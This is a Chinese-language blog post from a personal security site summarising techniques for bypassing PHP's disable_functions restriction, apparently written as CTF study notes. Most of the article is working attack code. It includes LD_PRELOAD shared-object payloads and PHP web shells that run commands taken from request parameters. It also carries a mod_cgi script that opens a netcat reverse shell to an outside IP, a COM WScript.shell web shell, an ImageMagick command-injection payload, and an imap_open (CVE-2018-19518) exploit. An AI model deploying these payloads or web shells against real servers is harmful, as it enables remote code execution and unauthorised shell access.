
	<!DOCTYPE html>
	<html class="scrollbar">
		

<head>
	<meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no">
  <title>
    
      bypass disfunction | 似雍&amp;&amp;非庸
    
  </title>
  <meta name="author" content="Alex">
  <meta name="keywords" content="Hexo, NexT" />
  <meta name="description" content="个人博客" />
	<!-- favicon -->
  <link rel="shortcut icon" href="/img/favicon.ico">

  <!-- css -->
  <link rel="stylesheet" href="/css/style.css">
<link rel="stylesheet" href="https://cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css">
  

    <!-- jquery -->
	<script src="/js/jquery-2.1.1.min.js"></script>

  <!-- leancloud -->
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
<script src="/js/leancloud.js"></script>
<link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"></head>
	<body>
		<!-- Preloader -->

	<div id="preloader">
		<div class="pre-container">
			
				<div class="transition">
					<div class="three-bounce1"></div>
					<div class="three-bounce2"></div>
					<div class="three-bounce3"></div>
				</div>
						
		</div>
	</div>


<!-- header -->
<header class="fixbackground" data-img-mode="random" data-normal-src="https://source.unsplash.com/collection/954550/1920x1080" data-random-max="110" data-random-src="/images/post-cover/">
	<div class="mask">
		<div class="h-header">
			<div id="logo-S">
				
					<a href="/">
						<img src="/img/logo.png" alt="Logo">
					</a>
				
			</div>
			<!-- Navigation in header(id="navigation-S") -->
			<div id="navigation-S">
				<ul>
					
						<li class="menu-home">
							<a href="/" class="menu-item-home">主页</a>
						</li>
					
						<li class="menu-archive">
							<a href="/archives" class="menu-item-archive">归档</a>
						</li>
					
						<li class="menu-categories">
							<a href="/categories" class="menu-item-categories">分类</a>
						</li>
					
						<li class="menu-tags">
							<a href="/tags" class="menu-item-tags">标签</a>
						</li>
					
						<li class="menu-about">
							<a href="/about" class="menu-item-about">关于</a>
						</li>
					
						<li class="menu-gallery">
							<a href="/gallery" class="menu-item-gallery">相册</a>
						</li>
					

					
						<li class="menu-search">
							<a href="javascript:;" class="popup-trigger" title="Search">搜索</a>
						</li>
					
				</ul>			
			</div>				
		</div>

		<div class="h-body">	
			<!-- motto -->
			
				<div id="page-motto">
					<p class="motto">
						
					</p>
				</div>
			

			<div id="navigation-H">
				<!-- Page title -->
				<p>
					
						当前文章&nbsp;:&nbsp;《bypass disfunction》
					
				</p>
				<!-- Progress bar -->
				<div id="progress-bar"></div>

				<!-- Progress percent -->
				<div id="progress-percentage">
					<h1>0.0%</h1>
				</div>
			</div>
		</div>
		
		<!-- others: such as time... -->			
		<div class="h-footer">
			<ul>
				<li>
					<a><i class="fa fa-camera-retro" onclick="changeHeaderBg()"></i>切换背景</a>
				</li>
				<li>
					<a href="javascript:;" id="read-more"><i class="fa fa-angle-double-down"></i>继续阅读</a>
				</li>
				<li>
					<a href="https://github.com/Sariay/hexo-theme-Annie" target="_blank"><i class="fa fa-download"></i>克隆主题</a>
				</li>
			</ul>
		</div>
		
		<!-- This is only a demo, please go to "https://time.is" to set your city time! -->
<style type="text/css">
	.header-date {
		position: absolute;
		left: 40px;
		bottom: 30px;
		writing-mode: tb-rl;
		font-size: 36px;
	}	
	.header-date a {
		border-bottom: none;
	}
	@media only screen and (max-width: 768 ) {
		.header-date {
			position: absolute;
			left: 40px;
			bottom: 30px;
			writing-mode: tb-rl;
			font-size: 20px;
		}			
	}
</style>
<div class="header-date">
	<a href="https://time.is/Beijing" id="time_is_link" rel="nofollow" ></a>
	<span id="Beijing_z43d"></span>
</div>
<script src="//widget.time.is/zh.js"></script>
<script>
	time_is_widget.init({
		Beijing_z43d:{
			template:"DATE", 
			date_format:"year年 monthname dnum日"
		}
	});
</script>
</header>

<!-- Navigation in div(id="navigation-H") -->
<a class="nav-trigger">
	<span></span>
</a>

<nav class="nav-container" id="cd-nav">
	<div class="nav-header">
		<h3>Navigation</h3>
		<a href="javascript:;" class="nav-close"></a>
	</div>
	<div class="nav-body">
		<ul>
			
				<li class="menu-home">
					<a href="/" class="menu-item-home">主页</a>
				</li>
			
				<li class="menu-archive">
					<a href="/archives" class="menu-item-archive">归档</a>
				</li>
			
				<li class="menu-categories">
					<a href="/categories" class="menu-item-categories">分类</a>
				</li>
			
				<li class="menu-tags">
					<a href="/tags" class="menu-item-tags">标签</a>
				</li>
			
				<li class="menu-about">
					<a href="/about" class="menu-item-about">关于</a>
				</li>
			
				<li class="menu-gallery">
					<a href="/gallery" class="menu-item-gallery">相册</a>
				</li>
			

			
				<li class="menu-search">
					<a href="javascript:;" class="popup-trigger" title="Search">搜索</a>
				</li>
			
		</ul>
	</div>

	<div class="nav-footer">
		<ul>
	
		
			<li>
				<a href="http://github.com/" title="Github" target="_blank">
					<i class="fa fa-github"></i>
				</a>
			</li>
		
		
			<li>
				<a href="http://github.com/" title="Weibo" target="_blank">
					<i class="fa fa-weibo"></i>
				</a>
			</li>
		
		
			<li>
				<a href="mailto:http://github.com/" title="Email" target="_blank">
					<i class="fa fa-envelope-o"></i>
				</a>
			</li>
		

		
			<li>
				<a href="http://github.com/" title="QQ" target="_blank">
					<i class="fa fa-qq"></i>
				</a>
			</li>
		
		
			<li>
				<a href="http://github.com/" title="Twitter" target="_blank">
					<i class="fa fa-twitter"></i>
				</a>
			</li>
		
	 
</ul>
	</div>
</nav>

		
		<!--main-->
		<main>
			<div class="layout-post">
	
	
	<div class="article-title">
		
	<a href="/2019/11/20/bypass-disfunction/" itemprop="url">
		bypass disfunction
	</a>

	</div>

	<div class="article-meta">
		<span>
			
	发布于
	<a href="/2019/11/20/bypass-disfunction/" itemprop="url">
		<time datetime="2019-11-20T13:50:31.000Z" itemprop="datePublished">
	  		2019-11-20
	  </time>
	</a> 

	/
	更新于
	<a href="/2019/11/20/bypass-disfunction/" itemprop="url">
		<time datetime="2019-11-20T13:50:31.000Z" itemprop="dateUpdated">
	  		2019-11-28
	  </time>
	</a> 	

		</span>
		/
		<span>
			<i class="fa fa-tags"></i>
			
	
		<a href="/tags/知识总结/" class=" ">
			知识总结
		</a>
	
		
		</span>
		/
		

    <span class="leancloud_visitors" id="/2019/11/20/bypass-disfunction/_visitors" data-url="/2019/11/20/bypass-disfunction/" data-title="bypass disfunction">
        热度
        <i class="leancloud_visitors_count" id="leancloud_visitors_count">0</i>
    </span>
    
    /



    <span class="leancloud_likes" id="/2019/11/20/bypass-disfunction/_likes" data-url="/2019/11/20/bypass-disfunction/" data-title="bypass disfunction" rel="unlike">
        喜欢
        <i class="fa fa-heart"></i>
        <i class="leancloud_likes_count" id="leancloud_likes_count">0</i>
    </span>

	</div>

	<div class="article-content" id="article-content">
		<h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>PHP 的 disabled_functions主要是用于禁用一些危险的函数防止攻击者执行系统命令。但是有一些绕过方法。这里做个总结。</p>
<h2 id="基本思路"><a href="#基本思路" class="headerlink" title="基本思路"></a>基本思路</h2><p>有四种绕过 disable_functions 的手法：第一种，攻击后端组件，寻找存在命令注入的、web 应用常用的后端组件，如，ImageMagick 的魔图漏洞、bash 的破壳漏洞；第二种，寻找未禁用的漏网函数，常见的执行命令的函数有 system()、exec()、shell_exec()、passthru()，偏僻的 popen()、proc_open()、pcntl_exec()，imap_open逐一尝试，或许有漏网之鱼；第三种，mod_cgi 模式，尝试修改 .htaccess，调整请求访问路由，绕过 php.ini 中的任何限制；第四种，利用环境变量 LD_PRELOAD 劫持系统函数，让外部程序加载恶意 *.so，达到执行系统命令的效果。</p>
<h2 id="利用LD-PRELOAD劫持系统函数"><a href="#利用LD-PRELOAD劫持系统函数" class="headerlink" title="利用LD_PRELOAD劫持系统函数"></a>利用LD_PRELOAD劫持系统函数</h2><pre class="line-numbers language-html"><code class="language-html">LD_PRELOAD是Linux系统的一个环境变量，用于动态库的加载，动态库加载的优先级最高，
它可以影响程序的运行时的链接（Runtime linker），它允许你定义在程序运行前优先加
载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。通
过这个环境变量，我们可以在主程序和其动态链接库的中间加载别的动态链接库，甚至覆盖
正常的函数库。一方面，我们可以以此功能来使用自己的或是更好的函数（无需别人的源码）
，而另一方面，我们也可以以向别人的程序注入程序，从而达到特定的目的。
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>通俗的讲：LD_PRELOAD 是linux系统的一个环境变量，它可以影响程序的运行时的链接，它允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性的载入不同动态链接库中的相同函数。</p>
<p>其实现方式是通过在其它动态链接库之前提前被加载了我们构造的恶意动态链接库。</p>
<p>利用方式：我们写一个动态链接库覆盖该php函数调用的系统命令的某个函数，<code>putenv</code>设置优先加载我们的动态链接库。我们就可以覆盖该系统函数从而执行命令。</p>
<h3 id="putenv-mail"><a href="#putenv-mail" class="headerlink" title="putenv+mail"></a>putenv+mail</h3><pre class="line-numbers language-html"><code class="language-html">putenv ( string $setting ) : bool
添加setting到服务器环境。环境变量仅在当前请求的持续时间内存在。在请求结束时，环境将恢复到其原始状态。
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p>如果该函数未被ban掉的话，即使是禁用了其它常见的函数，也可能会导致我们执行命令。<br>操作步骤：</p>
<ol>
<li>生成一个我们的恶意动态链接库文件</li>
<li>利用putenv设置LD_PRELOAD为我们的恶意动态链接库文件的路径</li>
<li>配合php的某个函数去触发我们的恶意动态链接库文件</li>
<li>Getshell</li>
</ol>
<p>我们发现mail()函数可以使用，而mail()函数执行默认是会调用外部程序sendmail的，看一下php.ini就会发现默认调用<code>sendmail -t -i</code>。</p>
<p>然后就可以编写我们的动态链接库文件。</p>
<pre class="line-numbers language-html"><code class="language-html">文件名： alex.c
#include <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>stdlib.h</span><span class="token punctuation">></span></span>
#include <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>stdio.h</span><span class="token punctuation">></span></span>
#include <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>string.h</span><span class="token punctuation">></span></span>
void payload() {
        system("ls > alex");
}   
int  geteuid() {
if (getenv("LD_PRELOAD") == NULL) { return 0; }
unsetenv("LD_PRELOAD");
payload();
}
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>然后生成我们的动态链接程序</p>
<pre class="line-numbers language-html"><code class="language-html">gcc -c -fPIC alex.c -o alex

gcc -shared alex -o alex.so
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>然后编写php脚本mail.php</p>
<pre class="line-numbers language-html"><code class="language-html">文件名： alex.php
<span class="token prolog">&lt;?php
putenv("LD_PRELOAD=./alex.so");
mail("","","","","");
?></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>执行一下</p>
<pre class="line-numbers language-html"><code class="language-html">php -f alex.php
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>可以发现成执行了我们的命令，把命令结果写到了alex中了。</p>
<pre class="line-numbers language-html"><code class="language-html">alex ➜ ~  ls
alex      alex.so alex.c   alex.php  
alex ➜ ~  cat alex
alex
alex.c
alex.php
alex.so
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>sendmail二进制文件中使用了getuid库函数，这样我们可以覆盖getuid函数。写一个getuid函数，内容为用system函数运行环境变量中的某个参数。</p>
<pre class="line-numbers language-html"><code class="language-html">#include <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>stdlib.h</span><span class="token punctuation">></span></span>
#include <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>stdio.h</span><span class="token punctuation">></span></span>
#include <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>string.h</span><span class="token punctuation">></span></span>

int  getuid() {
const char* cmdline = getenv("EVIL_CMDLINE");
if (getenv("LD_PRELOAD") == NULL) { return 0; }
unsetenv("LD_PRELOAD");
system(cmdline);
}
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>写一个php文件，用putenv添加环境变量(一个是上传的so库地址、一个是要执行的命令)。将system命令输出内容写入指定文件，到时候读出就行。</p>
<pre class="line-numbers language-html"><code class="language-html"><span class="token prolog">&lt;?php
    $cmd = $_REQUEST["cmd"];
    $out_path = $_REQUEST["outpath"];
    $evil_cmdline = $cmd . " > " . $out_path . " 2>&amp;1";
    echo "&lt;p> &lt;b>cmdline&lt;/b>: " . $evil_cmdline . "&lt;/p>";
    putenv("EVIL_CMDLINE=" . $evil_cmdline);
    $so_path = $_REQUEST["sopath"];
    putenv("LD_PRELOAD=" . $so_path);
    mail("", "", "", "");
    echo "&lt;p> &lt;b>output&lt;/b>: &lt;br />" . nl2br(file_get_contents($out_path)) . "&lt;/p>";  
?></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>使用方式参见【2019极客大挑战RCE ME】</p>
<h3 id="putenv-error-log"><a href="#putenv-error-log" class="headerlink" title="putenv+error_log"></a>putenv+error_log</h3><p>当mail函数被ban了，可以使用<code>error_log</code>来bypass。</p>
<pre class="line-numbers language-html"><code class="language-html">error_log(error,type,destination,headers)

当type为1时，服务器就会把error发送到参数 destination 设置的邮件地址
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p><code>error_log</code>调用的过程中（当type为1时）和mail函数一样，是调用sendmail命令。</p>
<p>动态链接库文件同上<br>php脚本稍作改变：</p>
<pre class="line-numbers language-html"><code class="language-html"><span class="token prolog">&lt;?php
putenv("LD_PRELOAD=./alex.so");
error_log("alex",1,"","");
?></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>
<p>即可实现案例。<br>覆盖getuid函数的动态链接库文件也不变。<br>只需稍微改一下php文件：</p>
<pre class="line-numbers language-html"><code class="language-html"><span class="token prolog">&lt;?php
    $cmd = $_REQUEST["cmd"];
    $out_path = $_REQUEST["outpath"];
    $evil_cmdline = $cmd . " > " . $out_path . " 2>&amp;1";
    echo "&lt;p> &lt;b>cmdline&lt;/b>: " . $evil_cmdline . "&lt;/p>";
    putenv("EVIL_CMDLINE=" . $evil_cmdline);
    $so_path = $_REQUEST["sopath"];
    putenv("LD_PRELOAD=" . $so_path);
    error_log("alex",1, "", "");
    echo "&lt;p> &lt;b>output&lt;/b>: &lt;br />" . nl2br(file_get_contents($out_path)) . "&lt;/p>";  
?></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>使用方式和上面一样。</p>
<h3 id="无需劫持函数，加载动态链接库即可执行"><a href="#无需劫持函数，加载动态链接库即可执行" class="headerlink" title="无需劫持函数，加载动态链接库即可执行"></a>无需劫持函数，加载动态链接库即可执行</h3><p>如果系统没有安装sendmail或者禁用了，上面的办法就无法再使用了。不过有师傅发现不劫持特定函数也能执行命令。详情：<a href="https://www.freebuf.com/articles/web/192052.html" target="_blank" rel="noopener">无需sendmail：巧用LD_PRELOAD突破disable_functions</a></p>
<pre class="line-numbers language-html"><code class="language-html">GCC 有个 C 语言扩展修饰符 __attribute__((constructor))，可以让由它修饰的函数在 main() 之前执行，若它出现在共享对象中时，那么一旦共享对象被系统加载，立即将执行 __attribute__((constructor)) 修饰的函数。
用 LD_PRELOAD 手法突破 disable_functions 不要局限于仅劫持某一函数，而应考虑劫持共享对象。
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p>动态库payload改为:</p>
<pre class="line-numbers language-html"><code class="language-html">文件名:bypass_disablefunc.c
#define _GNU_SOURCE

#include <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>stdlib.h</span><span class="token punctuation">></span></span>
#include <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>stdio.h</span><span class="token punctuation">></span></span>
#include <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>string.h</span><span class="token punctuation">></span></span>

__attribute__ ((__constructor__)) void getuid() {
const char* cmdline = getenv("EVIL_CMDLINE");
if (getenv("LD_PRELOAD") == NULL) { return 0; }
unsetenv("LD_PRELOAD");
system(cmdline);
}
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>接着，用命令 <code>gcc -shared -fPIC bypass_disablefunc.c -o bypass_disablefunc_x64.so</code> 将 <code>bypass_disablefunc.c</code> 编译为共享对象 <code>bypass_disablefunc_x64.so</code><br>你要根据目标架构编译成不同版本，在 x64 的环境中编译，若不带编译选项则默认为 x64，若要编译成 x86 架构需要加上 -m32 选项。<br>只需要PHP 支持putenv()、mail() 即可，甚至无需安装 sendmail。<br>php文件使用mail函数那个即可。</p>
<h2 id="apache-mod-cgi模式"><a href="#apache-mod-cgi模式" class="headerlink" title="apache mod_cgi模式"></a>apache mod_cgi模式</h2><p>php在apache中的三种工作方式：CGI模式、FastCGI模式、apache handler。参考：<a href="http://baijiahao.baidu.com/s?id=1598862490641532035&amp;wfr=spider&amp;for=pc" target="_blank" rel="noopener">## PHP目前比较常见的五大运行模式</a><br>而这种攻击要求的就是具体在apache服务器的情况下，CGI模式才可以。<br>在phpinfo中看到<br><img src="https://s2.ax1x.com/2019/11/22/MT0tj1.png" alt="MT0tj1.png"><br>就可以确定是以cgi模式运行。<br>CGI模式下，每接受一个用户请求，apache都会fork一个进程运行CGI程序解析php脚本，在.htaccess中我们设置允许在web目录运行CGI程序，然后上传一个shell命令文件上去，执行就可以反弹一个shell了。<br>要求：</p>
<ol>
<li>apache且运行mod_cgi模式</li>
<li>web目录可写</li>
<li>允许.htaccess生效<br>在.htaccess 中添加以下内容，指定.dazzle为结尾的文件为CGI脚本程序并且允许本目录执行，我们只要同时上传一个.dazzle的shell就可以了。</li>
</ol>
<p>有师傅已写好了payload：</p>
<pre class="line-numbers language-html"><code class="language-html"><span class="token prolog">&lt;?php
$cmd = "nc -c '/bin/bash' 172.16.15.1 4444"; //command to be executed
$shellfile = "#!/bin/bash\n"; //using a shellscript
$shellfile .= "echo -ne \"Content-Type: text/html\\n\\n\"\n"; //header is needed, otherwise a 500 error is thrown when there is output
$shellfile .= "$cmd"; //executing $cmd
function checkEnabled($text,$condition,$yes,$no) //this surely can be shorter
{
    echo "$text: " . ($condition ? $yes : $no) . "&lt;br>\n";
}
if (!isset($_GET['checked']))
{
    @file_put_contents('.htaccess', "\nSetEnv HTACCESS on", FILE_APPEND); //Append it to a .htaccess file to see whether .htaccess is allowed
    header('Location: ' . $_SERVER['PHP_SELF'] . '?checked=true'); //execute the script again to see if the htaccess test worked
}
else
{
    $modcgi = in_array('mod_cgi', apache_get_modules()); // mod_cgi enabled?
    $writable = is_writable('.'); //current dir writable?
    $htaccess = !empty($_SERVER['HTACCESS']); //htaccess enabled?
        checkEnabled("Mod-Cgi enabled",$modcgi,"Yes","No");
        checkEnabled("Is writable",$writable,"Yes","No");
        checkEnabled("htaccess working",$htaccess,"Yes","No");
    if(!($modcgi &amp;&amp; $writable &amp;&amp; $htaccess))
    {
        echo "Error. All of the above must be true for the script to work!"; //abort if not
    }
    else
    {
        checkEnabled("Backing up .htaccess",copy(".htaccess",".htaccess.bak"),"Suceeded! Saved in .htaccess.bak","Failed!"); //make a backup, cause you never know.
        checkEnabled("Write .htaccess file",file_put_contents('.htaccess',"Options +ExecCGI\nAddHandler cgi-script .dizzle"),"Succeeded!","Failed!"); //.dizzle is a nice extension
        checkEnabled("Write shell file",file_put_contents('shell.dizzle',$shellfile),"Succeeded!","Failed!"); //write the file
        checkEnabled("Chmod 777",chmod("shell.dizzle",0777),"Succeeded!","Failed!"); //rwx
        echo "Executing the script now. Check your listener &lt;img src = 'shell.dizzle' style = 'display:none;'>"; //call the script
    }
}
?></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h2 id="系统组件绕过"><a href="#系统组件绕过" class="headerlink" title="系统组件绕过"></a>系统组件绕过</h2><p>window com组件(php 5.4及以下默认开启)(高版本扩展要自己添加）<br>添加方法：<br>在php相应版本下ext查找<code>php_com_dotnet.dll</code>,一般都会有。没有的话，下载添加到ext目录下。<br>查看php.ini中是否已经开启了com.allow_dcom = true</p>
<p>然后在查找php.ini里面查找下extension=php_com_dotnet.dll把前面的#号或;号去掉。<br>如果没有找到，添加上extension=php_com_dotnet.dll即可。<br>然后重启apache。<br>然后查看phpinfo();<br>如果有<br><img src="https://s2.ax1x.com/2019/11/22/MTvuKH.png" alt="MTvuKH.png"><br>说明添加成功。<br>如果com组件开启着可以利用shell上传文件</p>
<pre class="line-numbers language-html"><code class="language-html"><span class="token prolog">&lt;?php
$command=$_GET['a'];
$wsh = new COM('WScript.shell'); // 生成一个COM对象　Shell.Application也能
$exec = $wsh->exec("cmd /c ".$command); //调用对象方法来执行命令
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>成功绕过disfunction执行命令：<br><img src="https://s2.ax1x.com/2019/11/22/M7E4w8.png" alt="M7E4w8.png"></p>
<h2 id="利用ImageMagick漏洞绕过disable-function"><a href="#利用ImageMagick漏洞绕过disable-function" class="headerlink" title="利用ImageMagick漏洞绕过disable_function"></a>利用ImageMagick漏洞绕过disable_function</h2><h3 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h3><pre class="line-numbers language-html"><code class="language-html">apt-get update&amp;&amp;apt-get install imagemagick
convert -version //如果安装成功会返回imagemagick版本号

apt-get install php-pear php-dev
apt-get install libmagickwand-dev

1.wget http://pecl.php.net/get/imagick-3.4.3.tgz
2.tar -zxvf imagick-3.4.3.tgz
cd imagick-3.4.3

phpize

./configure --with-php-config=/usr/bin/php-config --with-imagick=/usr/local/imagemagick //注意php-config可能会不同，要根据你具体的情况来修改

make&amp;&amp;make install

改一波php.ini，随便一行添加：extension = imagick.so 重启apache2服务。

然后php -r "phpinfo();"|grep imagick，看有没有安装成功
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>安装成功后：<br><img src="https://s2.ax1x.com/2019/11/22/M7w25D.png" alt="M7w25D.png"></p>
<p>然后安装ffmpeg</p>
<pre class="line-numbers language-html"><code class="language-html">apt-get install ffmpeg
ffmpeg -v 看看是否安装成功
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<h3 id="利用"><a href="#利用" class="headerlink" title="利用"></a>利用</h3><p>可以知道当Imagick处理的文件是如下后缀的时候，就会调用外部程序ffmpeg去处理该文件。</p>
<pre class="line-numbers language-html"><code class="language-html">wmv,mov,m4v,m2v,mp4,mpg,mpeg,mkv,avi,3g2,3gp
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>例子：</p>
<pre><code>&lt;?php
$img = new Imagick(&#39;a.mp4&#39;);    //a.mp4文件必须存在，否则就会不去调用ffmpeg
?&gt;
</code></pre><p>这里我看的也不是太懂，挖坑，以后补。<br>payload：</p>
<pre class="line-numbers language-html"><code class="language-html"><span class="token prolog">&lt;?php
echo "Disable functions: " . ini_get("disable_functions") . "\n";
$command = isset($_GET['cmd']) ? $_GET['cmd'] : 'id';
echo "Run command: $command\n====================\n";

$data_file = tempnam('/tmp', 'img');
$imagick_file = tempnam('/tmp', 'img');

$exploit = &lt;&lt;&lt;EOF
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/image.jpg"|$command>$data_file")'
pop graphic-context
EOF;

file_put_contents("$imagick_file", $exploit);
$thumb = new Imagick();
$thumb->readImage("$imagick_file");
$thumb->writeImage(tempnam('/tmp', 'img'));
$thumb->clear();
$thumb->destroy();

echo file_get_contents($data_file);
?></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h2 id="利用imap-open-CVE-2018-19518"><a href="#利用imap-open-CVE-2018-19518" class="headerlink" title="利用imap_open(CVE-2018-19518)"></a>利用imap_open(CVE-2018-19518)</h2><p>CVE-2018-19518的环境可以直接使用vulhub上的环境：<a href="https://github.com/vulhub/vulhub/tree/master/php/CVE-2018-19518" target="_blank" rel="noopener">链接</a></p>
<p>php imap扩展用于在PHP中执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell，而debian/ubuntu中默认使用ssh来代替rsh的功能（也就是说，在debian系列系统中，执行rsh命令实际执行的是ssh命令）</p>
<p>ssh命令中可以通过设置<code>-oProxyCommand=</code>来调用第三方命令，攻击者通过注入注入这个参数，最终将导致命令执行漏洞。<br>即使是ssh连接失败了，但是命令还是能执行。</p>
<p>exp:</p>
<pre class="line-numbers language-html"><code class="language-html"><span class="token prolog">&lt;?php
$exp = "echo test!test! > /tmp/test";
$base64_exp = base64_encode($exp);
$server = "x -oProxyCommand=echo\t${base64_exp}|base64\t-d|sh}";
imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error());
?></span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h2 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h2><p><a href="https://xz.aliyun.com/t/4623" target="_blank" rel="noopener">Bypass disabled_functions一些思路总结</a><br><a href="https://blog.szfszf.top/tech/php%E7%BB%95%E8%BF%87disable_function-%E6%80%BB%E7%BB%93%E4%B8%8E%E5%AE%9E%E8%B7%B5/" target="_blank" rel="noopener">PHP绕过disable_function 总结与实践</a><br><a href="https://xz.aliyun.com/t/5320" target="_blank" rel="noopener">PHP Webshell下绕过disable_function的方法</a></p>
	
	</div>
	
	<div id="current-post-cover" data-scr="/images/post-cover/24.jpg"></div>

	<!-- relate post, comment...-->
	<div class="investment-container">
		<div class="investment-header">
			<div class="investment-title-1">
				<div class="on">相关文章</div>
				<div>评论</div>
			</div>
			<div class="investment-title-2">	            
				
	<span>
		<a href="javascript: window.scrollTo(0, 0);">返回顶部</a>
		
			<a href="/2019/12/01/2019安洵杯-2019广外比赛web部分题解/" title="2019安洵杯+2019广外比赛web部分题解" rel="prev">
				&laquo;上一篇
			</a>
		
		
			<a href="/2019/11/20/2019极客大挑战RCE-ME/" title="2019极客大挑战RCE ME" rel="next">
				下一篇&raquo;
			</a>
			
	</span>
      		
			</div>	
		</div>
		
		<div class="investment-content">
			<div class="investment-content-list">
				

<div class="relate-post">
	<ul>
		
				<li>
					<div>
						<a href="/2019/10/17/RCE提高篇/" title="RCE提高篇">
							RCE提高篇
						</a>
						<p>
							前言首先，需要了解一下命令执行的函数，这里推荐几篇文章，来认识这些函数。浅谈eval和assert从底层分析eval和assert的区别命令执行与代码执行的小结巧用命令注入的N种方式命令注入绕过姿势我就不在说这几个东西，大牛们都说的很...
						</p>
					</div>

					<a href="/2019/10/17/RCE提高篇/" title="RCE提高篇">				
						<img src="/images/post-cover/32.jpg" class="relateImg" alt="RCE提高篇">
					</a>
				</li>											
		
		
				<li>
					<div>
						<a href="/2019/06/11/php代码审计之文件包含/" title="php代码审计之文件包含">
							php代码审计之文件包含
						</a>
						<p>
							文件包含文件包含分为本地文件包含（Local File Inclusion，简LFI)和远程文件包含（Remote File Inclusion，简RFI）。
在php中常见的文件包含函数有：
include()
include_on...
						</p>
					</div>

					<a href="/2019/06/11/php代码审计之文件包含/" title="php代码审计之文件包含">				
						<img src="/images/post-cover/37.jpg" class="relateImg" alt="php代码审计之文件包含">
					</a>
				</li>											
		
		
				<li>
					<div>
						<a href="/2019/05/28/文件上传漏洞/" title="文件上传漏洞">
							文件上传漏洞
						</a>
						<p>
							前言我是根据upload-lab来总结文件上传漏洞。思维导图：
pass-01提示：在客户端使用js对不合法图片进行检查！所以我们可以通过抓包，改包就可以绕过。。。
pass-02提示：服务端对数据包的MIME进行检查！
这里是对Co...
						</p>
					</div>

					<a href="/2019/05/28/文件上传漏洞/" title="文件上传漏洞">				
						<img src="/images/post-cover/35.jpg" class="relateImg" alt="文件上传漏洞">
					</a>
				</li>											
		
		
				<li>
					<div>
						<a href="/2019/04/25/sql注入知识总结/" title="sql注入知识总结">
							sql注入知识总结
						</a>
						<p>
							前言最近，感觉知识学的有点混乱，来整理一波自己的知识。先总结一下sql注入吧。
知识储备sql注入中常用到的库和表information_schema库

这个数据库中保存着mysql服务器所保存的所有的其他数就库的信息，如数据库名，...
						</p>
					</div>

					<a href="/2019/04/25/sql注入知识总结/" title="sql注入知识总结">				
